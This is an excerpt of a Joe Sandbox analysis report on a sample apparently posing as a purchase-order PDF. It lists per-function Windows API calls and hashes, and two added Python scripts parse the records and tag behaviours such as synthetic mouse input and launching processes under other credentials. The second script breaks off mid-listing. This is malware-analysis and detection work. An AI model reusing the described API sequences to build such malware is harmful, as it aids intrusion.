                                                                                                                                                                                                                                                                                                            • Instruction ID: de699fe3e67e71f806f86ee7feca1bcffcb0489daa19151882f3061068cc4b26
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 37bca05dc5f282a43c1c57c3b808f61ec058395b4d713bcb6da44fc2610780a1
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D14182705043019FE320DF15C8C8F7B7BA8EB89724F04466EF9548B391DB74A846CB69
APIs
• InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B490
  • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
• ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4C2
• EnterCriticalSection.KERNEL32(00000000), ref: 0044B4E3
• LeaveCriticalSection.KERNEL32(00000000), ref: 0044B5A0
• ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B5BB
  • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
  • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
  • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
• InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5D1
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
• String ID:
• API String ID: 1726766782-0
• Opcode ID: cbcfa8e54091759680fb2fd2b0c7b0e35273af6c280fd0ab56d74fa78acbc3bb
• Instruction ID: bf52b5dc2e344941501510e432fc863898df75637e45487ca8cd05157db66b41
• Opcode Fuzzy Hash: cbcfa8e54091759680fb2fd2b0c7b0e35273af6c280fd0ab56d74fa78acbc3bb
• Instruction Fuzzy Hash: 09415C75104701AFD320EF26D845EABB3F8EF88708F008E2DF59A92650D774E945CB6A
APIs
• ShowWindow.USER32(?,00000000,?,?,?,?,00448962,004A83D8,?,?), ref: 004410F9
• EnableWindow.USER32(?,00000000), ref: 0044111A
• ShowWindow.USER32(?,00000000,?,?,?,?,00448962,004A83D8,?,?), ref: 00441183
• ShowWindow.USER32(?,00000004,?,?,?,00448962,004A83D8,?,?), ref: 00441192
• EnableWindow.USER32(?,00000001), ref: 004411B3
• SendMessageW.USER32(?,0000130C,?,00000000), ref: 004411D5
Similarity
• API ID: Window$Show$Enable$MessageSend
• String ID:
• API String ID: 642888154-0
• Opcode ID: c853c7407bbaf9010c68549c691492fdcd401e5b0cb22aeb5446aebbed6f20c9
• Instruction ID: 824eeaafe1f931a994963cd163acc5b0ce47b26168a6fd4ee38d593e4569daee
• Opcode Fuzzy Hash: c853c7407bbaf9010c68549c691492fdcd401e5b0cb22aeb5446aebbed6f20c9
• Instruction Fuzzy Hash: 14417770604245DFE725CF14C984FA6B7E5BF89300F1886AEE6859B3B2CB74A881CB55
APIs
• SendMessageW.USER32(00000000,00001024,00000000,?), ref: 004490E3
• SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004490F8
• SendMessageW.USER32(00000000,0000111E,00000000,?), ref: 0044910D
• InvalidateRect.USER32(?,00000000,00000001), ref: 00449124
• GetWindowLongW.USER32(00000000,000000F0), ref: 0044912F
• SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0044913C
Similarity
• API ID: MessageSend$LongWindow$InvalidateRect
• String ID:
• API String ID: 1976402638-0
• Opcode ID: 2b574cf222373ea94a5f8b1e2da5d15417ee742d7ff148607d59a4e94613559a
• Instruction ID: 8b80d2acd15126bdfc8b54909556444574c0e56a9806921f1e0b477f33817628
• Opcode Fuzzy Hash: 2b574cf222373ea94a5f8b1e2da5d15417ee742d7ff148607d59a4e94613559a
• Instruction Fuzzy Hash: F231B476244202AFF224DF04DC89FBBB7A9F785321F14492EF291973D0CA75AC469729
APIs
• GetForegroundWindow.USER32 ref: 00442597
  • Part of subcall function 004344B7: GetWindowRect.USER32(?,?), ref: 004344D3
• GetDesktopWindow.USER32 ref: 004425BF
• GetWindowRect.USER32(00000000), ref: 004425C6
• mouse_event.USER32(00008001,?,?,?,?), ref: 004425F5
  • Part of subcall function 00436272: Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
• GetCursorPos.USER32(?), ref: 00442624
• mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00442690
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 4137160315-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 9bf1d5af4d3523281d87c855d40d0150606dc562a9e0308dc2a2f88b36285eae
                                                                                                                                                                                                                                                                                                            • Instruction ID: 1581b522c3ee05a339ffa1fd07f9e8cd23967deed6539873686ea33d82c69dd2
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9bf1d5af4d3523281d87c855d40d0150606dc562a9e0308dc2a2f88b36285eae
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7C31C1B2104306ABD310DF54CD85E6BB7E9FB98304F004A2EF94597281E675E9058BA6

APIs
• SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044886C
• EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
• EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
• ShowWindow.USER32(004A83D8,00000000,004A83D8,?,?), ref: 00448C37
• ShowWindow.USER32(004A83D8,00000004,004A83D8), ref: 00448C43
• EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: Window$Enable$Show$MessageSend
• String ID:
• API String ID: 1871949834-0
• Opcode ID: 703f0702a5e3ae6889c0b2c4cbd553a5347372704319c0c884d711360b5070ea
• Instruction ID: fbfed122d4da650e42f877d7e8bff2bfe9b33138fa51555fe8345b8bcc16d821
• Opcode Fuzzy Hash: 703f0702a5e3ae6889c0b2c4cbd553a5347372704319c0c884d711360b5070ea
• Instruction Fuzzy Hash: A731F3B07443819BF7248E14C8C4BAFB7D0AB95345F08482EF981A63D1DBAC9846872A

APIs
• _memset.LIBCMT ref: 0044961A
• SendMessageW.USER32 ref: 0044964A
  • Part of subcall function 00433A98: _wcspbrk.LIBCMT ref: 00433AAC
• SendMessageW.USER32(?,00001074,?,00000001), ref: 004496AC
• _wcslen.LIBCMT ref: 004496BA
• _wcslen.LIBCMT ref: 004496C7
• SendMessageW.USER32(?,00001074,?,?), ref: 004496FD
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: MessageSend$_wcslen$_memset_wcspbrk
• String ID:
• API String ID: 1624073603-0
• Opcode ID: 3158986b153f08837b9b71a8f77f3cc169978b1c24ba43a32ffefb24081b9654
• Instruction ID: 7e49a266cf7116299f7bc8659d1ce07b00adedb8b3f1b428e1954e4b11147a1e
• Opcode Fuzzy Hash: 3158986b153f08837b9b71a8f77f3cc169978b1c24ba43a32ffefb24081b9654
• Instruction Fuzzy Hash: B631CA71508300AAE720DF15DC81BEBB7D4EBD4720F504A1FFA54862D0EBBAD945C7A6
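The records above list each function's imported calls with raw hexadecimal arguments, which is what an analyst has to decode by hand to see that the first function drives the cursor and the second hides and re-shows a window. The following Python is an added example, not part of the Joe Sandbox report: it parses records in the layout shown (the "APIs", "Memory Dump Source", "Joe Sandbox IDA Plugin" and "Similarity" blocks) into structured data, resolves the winuser.h constants that appear in the arguments (mouse_event flags 0x8001 = MOUSEEVENTF_MOVE|MOUSEEVENTF_ABSOLUTE, SendMessageW messages 0xF1 = BM_SETCHECK and 0x1074 = LVM_SETITEMTEXTW, ShowWindow commands 0 = SW_HIDE and 4 = SW_SHOWNOACTIVATE), and lists the functions that inject mouse input. SAMPLE is constructed by condensing lines visible above, with one "Associated" line keeping the rendered page's trailing "Download File" link text so the stripping is exercised; the constant tables and the synthetic-input heuristic are the editor's, not Joe Sandbox signatures.

```python
"""Structure the per-function records of a Joe Sandbox report ('APIs', 'Memory
Dump Source', 'Joe Sandbox IDA Plugin', 'Similarity' blocks) and decode the USER32
constants in their arguments.  Added example; SAMPLE is condensed from report lines."""
import re
from dataclasses import dataclass, field

API_RE = re.compile(r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}): )?(?P<name>\w+)"
                    r"\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]{8})$")
KV_RE = re.compile(r"^•\s*(?P<key>[^:]+):\s*(?P<val>.*)$")
MOUSEEVENTF = {0x1: "MOVE", 0x2: "LEFTDOWN", 0x4: "LEFTUP", 0x8: "RIGHTDOWN", 0x8000: "ABSOLUTE"}
WINDOW_MSG = {0x00F1: "BM_SETCHECK", 0x1074: "LVM_SETITEMTEXTW"}
SHOWWINDOW = {0: "SW_HIDE", 4: "SW_SHOWNOACTIVATE"}   # winuser.h values (editor-supplied tables)

@dataclass
class FuncRecord:
    apis: list = field(default_factory=list)      # (name, module, args, ref)
    subcalls: list = field(default_factory=list)  # (callee, name, module, args, ref)
    meta: dict = field(default_factory=dict)      # Source File, Opcode ID, hashes ...

def parse_records(text):
    """One FuncRecord per disassembled function, in report order."""
    records, cur, section = [], FuncRecord(), None
    def flush():
        nonlocal cur
        if cur.apis or cur.meta:
            records.append(cur)
        cur = FuncRecord()
    for line in (l.strip() for l in text.splitlines()):
        if line == "APIs":                  # a function with imports starts here
            flush(); section = "apis"
        elif line == "Memory Dump Source":  # a function without imports starts here
            if "Source File" in cur.meta:
                flush()
            section = "meta"
        elif not line or line in ("Joe Sandbox IDA Plugin", "Similarity"):
            continue
        elif section == "apis" and (m := API_RE.match(line)):
            # hex arguments become ints; '?' (unknown at analysis time) stays a string
            args = tuple(int(a, 16) if re.fullmatch(r"[0-9A-Fa-f]+", a) else a
                         for a in (m["args"] or "").split(",") if a)
            entry = (m["name"], m["module"], args, m["ref"])
            if m["sub"]:
                cur.subcalls.append((m["sub"],) + entry)
            else:
                cur.apis.append(entry)
        elif m := KV_RE.match(line):
            val = m["val"].removesuffix("Download File")   # link text from the rendered page
            if m["key"] == "Associated":
                cur.meta.setdefault("Associated", []).append(val)
            else:
                cur.meta[m["key"]] = val
    flush()
    return records

def decode_flags(value, table):
    """Expand a flag word into names from table; unknown bits are kept as hex."""
    names = [n for bit, n in table.items() if value & bit]
    rest = value & ~sum(table)
    return names + ([f"0x{rest:X}"] if rest else [])

def annotate(rec):
    """Readable notes for USER32 calls whose constant arguments are resolvable."""
    notes = []
    for name, _mod, args, ref in rec.apis:
        if name == "mouse_event" and args and isinstance(args[0], int):
            notes.append(f"{ref}: mouse_event " + "|".join(decode_flags(args[0], MOUSEEVENTF)))
        elif name == "SendMessageW" and len(args) > 1 and isinstance(args[1], int):
            notes.append(f"{ref}: SendMessageW {WINDOW_MSG.get(args[1], f'0x{args[1]:04X}')}")
        elif name == "ShowWindow" and len(args) > 1 and isinstance(args[1], int):
            notes.append(f"{ref}: ShowWindow {SHOWWINDOW.get(args[1], str(args[1]))}")
    return notes

def synthetic_input(records):
    """(index, Opcode ID) of every function that injects mouse input via mouse_event."""
    return [(i, r.meta.get("Opcode ID")) for i, r in enumerate(records)
            if any(a[0] == "mouse_event" for a in r.apis)]

SAMPLE = """\
APIs
• GetForegroundWindow.USER32 ref: 00442597
  • Part of subcall function 004344B7: GetWindowRect.USER32(?,?), ref: 004344D3
• GetDesktopWindow.USER32 ref: 004425BF
• GetWindowRect.USER32(00000000), ref: 004425C6
• mouse_event.USER32(00008001,?,?,?,?), ref: 004425F5
• GetCursorPos.USER32(?), ref: 00442624
• mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00442690
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Similarity
• API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
• Opcode ID: 9bf1d5af4d3523281d87c855d40d0150606dc562a9e0308dc2a2f88b36285eae
APIs
• SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044886C
• SendMessageW.USER32(?,00001074,?,00000001), ref: 004496AC
• ShowWindow.USER32(004A83D8,00000000,004A83D8,?,?), ref: 00448C37
• ShowWindow.USER32(004A83D8,00000004,004A83D8), ref: 00448C43
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• API ID:
"""
```

Running `annotate` over the parsed records turns the two `mouse_event(00008001, ...)` calls into `MOVE|ABSOLUTE`, i.e. the function positions the cursor at absolute screen coordinates after reading the foreground and desktop window rectangles, and `synthetic_input` returns that function's Opcode ID so it can be matched against other reports. A record that starts at "Memory Dump Source" without an "APIs" block (as the last record above does) is kept as a function with no resolved imports rather than being merged into its predecessor.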

Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID:
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                                            • Opcode ID: 8dc28afdcb3e23db499faf1906c1cec9916ddd90de084288035f36419de8ba35
                                                                                                                                                                                                                                                                                                            • Instruction ID: 0263b137e1f68684b0dae4bb7f633391a2f723f0f4072b7ce39308acd6c8c458
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8dc28afdcb3e23db499faf1906c1cec9916ddd90de084288035f36419de8ba35
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 31219272245110ABE7108B68DCC4B6F7798EB96374F240A3AF512C61E1EA7998C1C769
APIs
• MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004555AD
• DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
• DeleteObject.GDI32(?), ref: 0045564E
• DeleteObject.GDI32(?), ref: 0045565C
• DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
• DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: DestroyWindow$DeleteObject$IconMove
• String ID:
• API String ID: 1640429340-0
• Opcode ID: da39536b61dc90218e8938c0c8165bcff49a91d8f884d8405ba8ed69dafdd4fa
• Instruction ID: 2ee25f48dcb0ad8048bc4d9c922f6cac320a9d705fdb810e808868a6102f62dc
• Opcode Fuzzy Hash: da39536b61dc90218e8938c0c8165bcff49a91d8f884d8405ba8ed69dafdd4fa
• Instruction Fuzzy Hash: 05312770200A419FD724DF24C998B3A73F9FB44312F4485AAE945CB266E778EC49CB69
APIs
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: Destroy$DeleteMenuObject$IconWindow
• String ID:
• API String ID: 752480666-0
• Opcode ID: e2db828b4da75c1988a3618645d7ad87c2567147b1e4a2a373431826dce2281b
• Instruction ID: bf467a0aa8f060071afd9cdae546a2eb92d9c059e8a57ac1e588bb5f3fc3a395
• Opcode Fuzzy Hash: e2db828b4da75c1988a3618645d7ad87c2567147b1e4a2a373431826dce2281b
• Instruction Fuzzy Hash: 26215E30200A019FC724DF24D5E8B7AB7A9FB44312F50855EED498B392CB39EC89CB59
APIs
• DestroyWindow.USER32(00000000), ref: 0045527A
• ImageList_Destroy.COMCTL32(?), ref: 0045528C
• DeleteObject.GDI32(?), ref: 0045564E
• DeleteObject.GDI32(?), ref: 0045565C
• DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
• DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: Destroy$DeleteObjectWindow$IconImageList_
• String ID:
• API String ID: 3275902921-0
• Opcode ID: 9ca718b8a23ef3076e20a4bf5a66fd8e296fb8dfd37af4e8726ba93a3cadf818
• Instruction ID: c357af2a313eda44c34a26cb015c973203dd8f66e4d80e74dc1abfaeb9ce60f9
• Opcode Fuzzy Hash: 9ca718b8a23ef3076e20a4bf5a66fd8e296fb8dfd37af4e8726ba93a3cadf818
• Instruction Fuzzy Hash: 2D217E70604A019BC714DF79D99466AB7A5BF44311F40856EF919CB342DB38E849CF68
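The per-function API listings in this section are the most useful part of the disassembly dump for triage, and the one that follows (GetCurrentProcess, OpenProcessToken, CreateEnvironmentBlock, CloseHandle, CreateProcessWithLogonW, all in one function around 0x00439300) is the textbook sequence for launching a child process under supplied credentials with an environment block built from a token. In that listing the fourth argument of CreateProcessWithLogonW (dwLogonFlags) is printed as 00000000 and the fifth (lpApplicationName) as 00000000, so the target would be carried in the command-line parameter. Two caveats when reading these bullets: "ref" is the call-site address in the dumped image, so the order is address order, not execution order; and the report prints more values than an API declares, so everything past the prototype's parameter count is stack context at the call site, not an argument, and "?" marks a value the sandbox did not recover. The script below is an added example, not Joe Sandbox's or the report's own code: it parses bullets of this shape, trims each call to its real parameter count, and tags a function when a set of calls of interest is present. The input is constructed from the bullet lines quoted on this page; the function labels fn_A, fn_B and fn_C are placeholders (the excerpt does not name the functions), and the ARITY and SIGNATURES tables are the author's assumptions, not report fields.

```python
"""Parse Joe Sandbox-style "APIs" bullets and tag behaviours per function.

Added example, not Joe Sandbox code. Sample input below is constructed from
the bullet lines quoted in the report section; ARITY and SIGNATURES are the
author's own tables (assumptions), not fields of the report.
"""
import re
from dataclasses import dataclass

# One bullet per call site, e.g.
#   • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,?,?,?,?), ref: 004393C0
API_LINE = re.compile(
    r"^\s*[•*-]?\s*(?P<api>\w+)\.(?P<module>[A-Za-z0-9_]+)"
    r"\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Declared parameter counts from the public Win32 prototypes (assumption: table
# maintained by hand). The report prints extra stack values past this count.
ARITY = {
    "GetCurrentProcess": 0, "OpenProcessToken": 3, "CreateEnvironmentBlock": 3,
    "CloseHandle": 1, "CreateProcessWithLogonW": 11, "MoveWindow": 6,
    "DestroyWindow": 1, "DeleteObject": 1, "DestroyIcon": 1, "ImageList_Destroy": 1,
}

# Behaviour tags keyed on the set of APIs a function must contain (assumption:
# the author's own triage table, not a Joe Sandbox signature).
SIGNATURES = {
    "alt_credential_launch": (
        {"OpenProcessToken", "CreateEnvironmentBlock", "CreateProcessWithLogonW"},
        "process launched under supplied credentials with a token-built environment",
    ),
    "gui_teardown": (
        {"DestroyWindow", "DeleteObject"},
        "window/GDI handle cleanup, not security relevant on its own",
    ),
}


@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    raw_args: tuple   # every value printed, '?' = not recovered by the sandbox
    ref: int          # call-site address in the dumped image (not execution order)

    @property
    def args(self):
        """Only the values that map to declared parameters; the rest is stack context."""
        n = ARITY.get(self.api)
        return self.raw_args if n is None else self.raw_args[:n]


def parse_api_line(line):
    """Return an ApiCall for a report bullet, or None if the line is not one."""
    m = API_LINE.match(line)
    if not m:
        return None
    raw = m.group("args")
    args = tuple(a.strip() for a in raw.split(",")) if raw.strip() else ()
    return ApiCall(m.group("api"), m.group("module"), args, int(m.group("ref"), 16))


def analyze(listings):
    """listings: {function_label: [bullet lines]} -> per-function calls, modules, tags."""
    report = {}
    for name, lines in listings.items():
        calls = sorted(filter(None, map(parse_api_line, lines)), key=lambda c: c.ref)
        present = {c.api for c in calls}
        tags = [tag for tag, (needed, _) in SIGNATURES.items() if needed <= present]
        report[name] = {
            "calls": calls,
            "modules": sorted({c.module for c in calls}),
            "tags": tags,
        }
    return report


def logon_launch_details(call):
    """(dwLogonFlags, lpApplicationName) as printed for a CreateProcessWithLogonW call.

    Prototype order: user, domain, password, logon flags, application name,
    command line, creation flags, environment, cwd, startup info, process info.
    """
    if call.api != "CreateProcessWithLogonW":
        raise ValueError("not a CreateProcessWithLogonW call")
    return call.args[3], call.args[4]


# Constructed input: the bullet lines from this report section, grouped per
# function. fn_A/fn_B/fn_C are placeholder labels; the excerpt names no functions.
LISTINGS = {
    "fn_A": [
        "• MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004555AD",
        "• DestroyWindow.USER32(?,?,?,?,?), ref: 00455640",
        "• DeleteObject.GDI32(?), ref: 0045564E",
        "• DeleteObject.GDI32(?), ref: 0045565C",
        "• DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A",
        "• DestroyWindow.USER32(?,?,?,?,?), ref: 00455678",
    ],
    "fn_B": [
        "• DestroyWindow.USER32(00000000), ref: 0045527A",
        "• ImageList_Destroy.COMCTL32(?), ref: 0045528C",
        "• DeleteObject.GDI32(?), ref: 0045564E",
        "• DeleteObject.GDI32(?), ref: 0045565C",
        "• DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A",
        "• DestroyWindow.USER32(?,?,?,?,?), ref: 00455678",
    ],
    "fn_C": [
        "• GetCurrentProcess.KERNEL32(0000000A,?,?,?,?,?,00446540,?,?,?,?,?,?,?,?,?), ref: 0043935D",
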